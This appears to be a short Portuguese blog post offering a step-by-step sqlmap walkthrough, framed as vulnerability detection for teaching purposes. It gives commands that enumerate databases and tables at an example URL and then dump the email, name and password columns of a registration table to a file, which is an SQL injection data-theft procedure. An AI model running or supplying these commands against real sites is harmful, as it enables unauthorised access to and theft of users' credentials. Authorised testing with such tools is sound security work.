em Geral

Como usar o Sqlmap para detectar vulnerabilidades em seu projeto

O SQLmap é um script para detecção e SQL injection. Não nos responsabilizamos pelo conteúdo deste post e o intuito foi apenas para fins didáticos.

Primeiramente é necessário que você detect em uma determinada url os parametros que são recebidos via post ou get como formulários, etc..

Sendo assim vamos utilizar o exemplo abaixo para buscar este parametros

python sqlmap.py -u “http://www.teste.com.br/galerias/?id=541” –dbs

se tudo correr bem você poderá encontrar o nome do banco de dados utilizado pelo projeto que neste caso é teste. Com isto o segundo passo é encontrar as tabelas do projeto.
Enviaremos um injection solicitando as tabelas da seguinte maneira

python sqlmap.py -u “http://www.teste.com.br/galerias/?id=541” -D teste –tables

Agora com os nomes de tabela é possível selecionar as colunas que deseja fazer o dump e simplesmente esperar a coisa acontecer

python sqlmap.py -u “http://www.teste.com.br/galerias/?id=541” -D teste -T tbl_cadastros -C email,nome,senha –dump

com isto será feito um dump da tabela cbbs no qual poderá ser enviado para um documento de texto qualquer